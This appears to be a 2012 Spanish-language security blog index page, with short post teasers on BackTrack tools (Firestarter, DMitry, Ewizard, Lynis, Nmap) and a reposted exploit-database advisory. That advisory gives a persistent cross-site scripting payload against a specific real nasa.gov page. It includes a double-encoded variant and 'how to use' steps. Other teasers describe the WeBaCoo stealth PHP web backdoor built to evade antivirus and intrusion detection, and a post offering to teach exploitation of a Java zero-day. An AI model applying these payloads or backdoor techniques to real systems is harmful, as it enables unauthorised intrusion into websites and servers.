Kylin OS (Sistema Operativo del Gobierno de China) basado en FreeBSD


Después de la reciente escalada de Ciberataques producidos en territorio Estadounidense y las posteriores acusaciones al Gobierno Chino de estar creando un caldo de cultivo para una inminente Ciberguerra, ha surgido información que indica que el Gobierno Chino ha desplegado un un nuevo Sistema Operativo de nombre Kylin, que en teoría sería invulnerable ante cualquier forma conocida de ataque, ya sea que provenga de los Estados Unidos, o de cualquier otra fuente. Si bien no han comenzado a lanzarse misiles virtuales, las medidas de defensa adoptadas por ambas potencias arrojan un velo de preocupación sobre la comunidad digital mundial.

domingo, 9 de septiembre de 2012

[Firestarter] Cortafuegos en BackTrack




Firestarter es una herramienta de cortafuegos personal libre y de código abierto que usa el sistema (iptables/ipchains) Netfilter incluido en el núcleo Linux. Firestarter posee una interfaz gráfica para configurar reglas de cortafuegos y otras opciones. También monitoriza en tiempo real todo el tráfico de red del sistema, además de facilitar el redireccionamiento de puertos, compartir la conexión a internet y el servicio DHCP.


jueves, 6 de septiembre de 2012

Recopilando Información de Servidores con DMitry


DESCRIPCIÓN:

Dmitry (Deepmagic Information Gathering Tool) es una herramienta para UNIX/GNU exclusivamente programada en C la cual tiene la capacidad de reunir mucha informacion acerca de un Host.

Dmitry tiene una funcionalidad con la posibilidad de añadir nuevas funciones. La funcionalidad básica de Dmitry permite que la información sea recopilada sobre un host desde una simple búsqueda whois y escaneos de puertos TCP.

La aplicación se considera una herramienta para ayudar en la recopilación de información cuando la información es requerida rápidamente mediante la eliminación de la necesidad de introducir múltiples comandos.

lunes, 3 de septiembre de 2012

Encriptando y Desencriptando Archivos Confidenciales desde BackTrack con Ewizard



Encryption Wizard (Ewizard) es un simple y fuerte encriptador de archivos y carpetas programada en Java que sirve para proteger la información confidencial (FOUO, Privacy Act, CUI, etc.).

Ewizard encripta todos los tipos de archivos sin privilegios de instalación o elevada ya que se puede ejecutar en Windows, Mac, Linux, Solaris y otros equipos que cuenten con Sun Java.

Detrás de su simple drag-n-drop interfaz, Ewizard ofrece 128-bit AES de cifrado, SHA-256 hashing, búsqueda de meta-datos, archivos, comprensión, eliminación segura y soporte PKI/CAC/PIV.

Ewizard fue inventado y es propiedad del Gobierno de los Estados Unidos de Norteamérica.

La versión publica de esta herramienta puede ser usado por cualquier persona, la versión EW-Public esta diseñada para las computadoras del Gobierno Federal de EE.UU y la version EW-Govt esta acreditado por el Ejercito y la Fuerza Aerea para NIPRNet y SIPRNet.

Esta herramienta, por supuesto, esta disponible en nuestra distro favorita (BackTrack 5r3)

Auditando nuestro Sistema con Lynis (Herramienta de Seguridad y Auditoria)



Al igual que muchas otras herramientas, Lynis fue incluido recientemente en el nuevo BackTrack 5 r3 como una herramienta de Auditoria y Seguridad para muchas distribuciones de Linux.

INTRODUCCIÓN:

Lynis es una herramienta de auditoría que analiza y recopila la información de los sistemas basados ​​en Unix. La audiencia de esta herramienta son la seguridad y el sistema de auditores, especialistas en redes y técnicos de mantenimiento del sistema.

Analiza el software del sistema para detectar problemas de seguridad, también buscará información general del sistema, los paquetes instalados y los errores de configuración.

Este programa tiene como objetivo ayudar en la auditoria automatizada, parches de software de gestión de vulnerabilidades y análisis de malware de los sistemas basados ​​en Unix. Se puede ejecutar sin instalación previa.

viernes, 31 de agosto de 2012

WordPress y Algunas de sus Vulnerabilidades


WordPress  ¿Qué es?

WordPress es un sistema de gestión de contenido (en inglés Content Management System, o CMS) enfocado a la creación de blogs (sitios web periódicamente actualizados). Desarrollado en PHP y MySQL, bajo licencia GPL y código modificable. WordPress se ha convertido junto a Movable Type en el CMS más popular de la blogosfera y en el más popular con respecto a cualquier otro CMS de aplicación general. Las causas de su enorme crecimiento son, entre otras, su licencia, su facilidad de uso y sus características como gestor de contenidos.

jueves, 30 de agosto de 2012

Backdorizando Servidores Web con WeBaCoo



WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.

miércoles, 29 de agosto de 2012

Explotando Vulnerabilidad 0day en Java7 - Exploit .JAR


Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

lunes, 27 de agosto de 2012

Comandos Avanzados de Nmap


Nmap (Network Mapper), es una herramienta open source, diseñada para explorar y para realizar auditorias de seguridad en una red de computadoras.

Esta herramienta es muy usada por los Pentesters cuando realizan  Pruebas de Penetración.

Nmap, es sin duda, y no por que sea el único, el primer scanner usado por excelencia por la mayoría de los especialistas para el reconocimiento de una pc o una red y esta disponible tanto para Windows como para GNU-Linux. 

Ahora bien, en esta entrada les dejare una pequeña lista sobre los comandos mas avanzados y usados para poder llevar a cabo una buena Prueba de Penetración.

Empecemos.

sábado, 25 de agosto de 2012

[EXPLOITS] Aplicaciones y Sistemas Web



Pequeña lista de Exploits disponibles para varias aplicaciones web y sistemas de gestión de contenidos (CMS), tales como Joomla, Wordpress, Drupal.

El fin de esta entrada es ayudar a los webmasters y administradores de sistemas en la protección de sus sitios web y sistemas contra vulnerabilidades.

jueves, 23 de agosto de 2012

Cross Site Scripting NASA.GOV



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                              1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent            |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor : NASA
# Category : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on   : BackTrack 5 r3 - Mozilla Firefox
# Contact      : calebbucker@gmail.com
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert
('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527
CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else
is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy!

# 1337day.com [2012-08-22]